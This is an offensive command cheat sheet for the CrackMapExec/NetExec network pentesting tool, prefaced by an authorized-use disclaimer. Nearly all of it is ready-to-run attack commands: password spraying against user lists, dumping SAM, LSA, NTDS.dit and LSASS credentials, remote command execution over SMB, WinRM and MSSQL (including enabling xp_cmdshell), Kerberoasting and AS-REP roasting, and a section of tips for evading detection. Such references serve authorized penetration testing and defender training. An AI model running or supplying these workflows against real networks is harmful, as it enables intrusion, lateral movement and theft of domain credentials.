CRACKMAPEXEC
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
CrackMapExec (now NetExec) is a Swiss army knife for pentesting networks. Supports SMB, LDAP, WinRM, MSSQL, SSH, RDP, WMI protocols.
INSTALLATION#
# NetExec (successor to CME) pip install netexec nxc --help # CrackMapExec (legacy) pip install crackmapexec cme --help
BASIC SYNTAX#
nxc <protocol> <target> [options] cme <protocol> <target> [options] # Protocols: smb, ldap, winrm, mssql, ssh, rdp, wmi, ftp
TARGET SPECIFICATION#
nxc smb 192.168.1.100 # Single IP nxc smb 192.168.1.0/24 # CIDR range nxc smb 192.168.1.1-100 # IP range nxc smb targets.txt # File with targets nxc smb 192.168.1.100,192.168.1.101 # Multiple IPs
AUTHENTICATION#
nxc smb target -u user -p password nxc smb target -u user -p 'P@ssw0rd!' nxc smb target -u user -H NTHASH nxc smb target -u user -H LMHASH:NTHASH nxc smb target -u user -p password -d domain nxc smb target -u users.txt -p passwords.txt # Spray nxc smb target -u user -p password --local-auth # Local account # Kerberos nxc smb target -u user -p password -k nxc smb target --use-kcache # Use ccache
SMB OPERATIONS#
ENUMERATION#
# Host info nxc smb target # Basic enum nxc smb target --shares # List shares nxc smb target --shares -u user -p pass nxc smb target --users # List users nxc smb target --groups # List groups nxc smb target --pass-pol # Password policy nxc smb target --rid-brute # RID cycling nxc smb target --sessions # Active sessions nxc smb target --disks # List disks nxc smb target --loggedon-users # Logged on users nxc smb target --local-groups # Local groups nxc smb target --wmi # WMI query # Spider shares nxc smb target -u user -p pass --spider C$ nxc smb target -u user -p pass --spider C$ --pattern txt,xml,config nxc smb target -u user -p pass -M spider_plus
PASSWORD SPRAYING#
# Single password against multiple users nxc smb target -u users.txt -p 'Password123' # Multiple passwords (careful with lockouts!) nxc smb target -u users.txt -p passwords.txt nxc smb target -u users.txt -p passwords.txt --no-bruteforce # One-to-one # Continue on success nxc smb target -u users.txt -p 'Password123' --continue-on-success
CREDENTIAL DUMPING#
# SAM dump nxc smb target -u admin -p pass --sam # LSA secrets nxc smb target -u admin -p pass --lsa # NTDS.dit (Domain Controller) nxc smb DC -u admin -p pass --ntds nxc smb DC -u admin -p pass --ntds vss # VSS method nxc smb DC -u admin -p pass --ntds drsuapi # DRSUAPI method # LSASS dump nxc smb target -u admin -p pass -M lsassy nxc smb target -u admin -p pass -M nanodump nxc smb target -u admin -p pass -M procdump
COMMAND EXECUTION#
# Execute commands nxc smb target -u admin -p pass -x "whoami" nxc smb target -u admin -p pass -x "ipconfig /all" # PowerShell execution nxc smb target -u admin -p pass -X "Get-Process" nxc smb target -u admin -p pass -X "$PSVersionTable" # Specify execution method nxc smb target -u admin -p pass -x "whoami" --exec-method smbexec nxc smb target -u admin -p pass -x "whoami" --exec-method wmiexec nxc smb target -u admin -p pass -x "whoami" --exec-method atexec nxc smb target -u admin -p pass -x "whoami" --exec-method mmcexec
FILE OPERATIONS#
# Put file nxc smb target -u admin -p pass --put-file /local/file.exe C:\\Windows\\Temp\\file.exe # Get file nxc smb target -u admin -p pass --get-file C:\\Windows\\win.ini /local/win.ini
MODULES#
# List modules nxc smb -L nxc smb -M module_name --options # Common modules nxc smb target -u admin -p pass -M lsassy # Dump LSASS nxc smb target -u admin -p pass -M mimikatz # Mimikatz nxc smb target -u admin -p pass -M gpp_password # GPP passwords nxc smb target -u admin -p pass -M gpp_autologin # GPP autologin nxc smb target -u admin -p pass -M spider_plus # Advanced share spider nxc smb target -u admin -p pass -M webdav # Check WebDAV nxc smb target -u admin -p pass -M petitpotam # PetitPotam nxc smb target -u admin -p pass -M zerologon # Zerologon check nxc smb target -u admin -p pass -M nopac # NoPAC check
LDAP OPERATIONS#
# Enumerate nxc ldap DC -u user -p pass nxc ldap DC -u user -p pass --users nxc ldap DC -u user -p pass --groups nxc ldap DC -u user -p pass --computers nxc ldap DC -u user -p pass --trusted-for-delegation nxc ldap DC -u user -p pass --admin-count # Kerberoasting nxc ldap DC -u user -p pass --kerberoasting # AS-REP roasting nxc ldap DC -u user -p pass --asreproast # Password not required nxc ldap DC -u user -p pass --password-not-required # GMSA passwords nxc ldap DC -u user -p pass --gmsa # MAQ (Machine Account Quota) nxc ldap DC -u user -p pass -M maq # Bloodhound nxc ldap DC -u user -p pass --bloodhound -c All
WINRM OPERATIONS#
nxc winrm target -u admin -p pass nxc winrm target -u admin -p pass -x "whoami" nxc winrm target -u admin -p pass -X "Get-Process"
MSSQL OPERATIONS#
# Connect nxc mssql target -u sa -p password # Execute query nxc mssql target -u sa -p pass -q "SELECT @@version" # Execute command via xp_cmdshell nxc mssql target -u sa -p pass -x "whoami" # Enable xp_cmdshell nxc mssql target -u sa -p pass --enable-xp-cmdshell # Get hashes nxc mssql target -u sa -p pass --get-hash
SSH OPERATIONS#
nxc ssh target -u user -p password nxc ssh target -u user -p password -x "id" nxc ssh target -u user --key-file id_rsa
RDP OPERATIONS#
nxc rdp target -u admin -p pass nxc rdp target -u admin -p pass --screenshot nxc rdp target -u admin -p pass --nla-screenshot
OUTPUT OPTIONS#
# Save output nxc smb target -u user -p pass --export results.txt # JSON output nxc smb target -u user -p pass --export results.json --json # Log file nxc smb target -u user -p pass -o /path/to/log
DATABASE#
# CME stores results in database # ~/.cme/cme.db (CME) # ~/.nxc/nxc.db (NetExec) # Query database cmedb nxcdb
COMMON WORKFLOWS#
# Network sweep nxc smb 192.168.1.0/24 # Identify DCs nxc smb 192.168.1.0/24 | grep "domain:" # Password spray nxc smb 192.168.1.0/24 -u users.txt -p 'Summer2024!' --continue-on-success # Check local admin nxc smb 192.168.1.0/24 -u admin -p pass # Dump credentials (admin required) nxc smb target -u admin -p pass --sam --lsa # BloodHound collection nxc ldap DC -u user -p pass --bloodhound -c All -ns DC_IP
EVASION TIPS#
# Specify execution method nxc smb target -u admin -p pass -x "cmd" --exec-method wmiexec # Use Kerberos nxc smb target -u user -p pass -k # Avoid common detections # - Use --no-bruteforce for spraying # - Limit concurrency # - Use Kerberos auth
QUICK REFERENCE#
nxc smb target # Host info nxc smb target --shares # List shares nxc smb target -u user -p pass --sam # Dump SAM nxc smb target -u user -p pass --ntds # Dump NTDS nxc smb target -u user -p pass -x "cmd" # Execute command nxc smb target -u user -p pass -M lsassy # Dump LSASS nxc ldap DC -u user -p pass --users # Enum users nxc ldap DC -u user -p pass --bloodhound -c All